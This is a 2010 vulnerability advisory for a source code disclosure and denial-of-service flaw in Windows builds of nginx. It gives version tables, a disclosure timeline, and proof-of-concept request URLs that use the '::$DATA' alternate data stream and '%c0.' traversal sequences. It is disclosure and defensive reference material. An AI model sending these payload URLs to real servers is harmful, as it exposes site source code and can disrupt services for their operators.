nginx Remote Source Code Disclosure and Denial of Service Vulnerabilities

http://www.example.com/index.html::$DATA
http://www.example.com/%c0.%c0./%c0.%c0./%c0.%c0./%c0.%c0./%20
http://www.example.com/%c0.%c0./%c0.%c0./%c0.%c0./%20
http://www.example.com/%c0.%c0./%c0.%c0./%20

======TESTED VERSIONS=====

Unix versions are not vulnerable (it only affects to NTFS file system)

Windows Stable versions:

nginx/0.7.66 --> Not vulnerable
nginx/0.7.65 --> Vulnerable
nginx/0.7.64 --> Vulnerable
nginx/0.7.63 --> Vulnerable
nginx/0.7.62 --> Vulnerable
nginx/0.7.61 --> Vulnerable
nginx/0.7.60 --> Vulnerable
nginx/0.7.59 --> Vulnerable
nginx/0.7.58 --> Vulnerable
nginx/0.7.56 --> Vulnerable

Windows Development versions:

nginx/0.8.40 --> Not vulnerable
nginx/0.8.39 --> Vulnerable
nginx/0.8.38 --> Vulnerable
nginx/0.8.37 --> Vulnerable
nginx/0.8.36 --> Vulnerable
nginx/0.8.35 --> Vulnerable
nginx/0.8.34 --> Vulnerable
nginx/0.8.33 --> Vulnerable
nginx/0.8.32 --> Vulnerable
nginx/0.8.31 --> Vulnerable
nginx/0.8.30 --> Vulnerable

======DESCRIPTION======

This application was vulnerable to source code disclosure/download vulnerability when
it was running in Windows OS (NTFS file system).
App parser couldn't handle ADS (Alternate Data Streams) and it treated a data stream as an
usual file. An Attacker could read/download source code of webapps files using default data
stream (unnamed): "filename::$data".

This issue is like an old security issue in Microsoft Windows IIS [ref-2].

======PROOF OF CONCEPT======

http://[IP]/[FILE]::$data

======STEPS TO REPRODUCE======

1.- Start the server.

2.- Go to http://127.0.0.1/index.html::$data

3.- Browser requests to download...yes...go to file and open it.

======REFERENCES======

[ref-1] -> http://nginx.org/
[ref-2] -> http://www.microsoft.com/technet/security/bulletin/ms98-003.mspx


======DISCLOSURE TIMELINE======

Standard Time Zone: GMT/UTC + 01:00 hour (Spain/Madrid)

[2010-06-04] => Inicial contact with vendor and sent advisory.
[2010-06-04] => Vendor response and believe that vulnerability got fixed with previous release.
[2010-06-04] => I confirm that nginx is vulnerable in Windows 7 OS.
[2010-06-04] => Vendor will try to see the issue.
[2010-06-04] => Vendor confirms the issue and he will get fixed on Monday.
[2010-06-07] => New releases out.
[2010-06-07] => I sent complete advisory and propose as disclosure date on Wednesday.
[2010-06-10] => Second chance to confirm public disclosure.
[2010-06-10] => Vendor is agree.
[2010-06-11] => Forced to public disclosure.

======CREDITS=======

Jose Antonio Vazquez Gonzalez,
Telecom. Engineer & Sec. Researcher.
http://spa-s3c.blogspot.com/

Thanks to Ruben Santamarta (@reversemode) and Jose María Alonso (@maligno) for their support in other issues.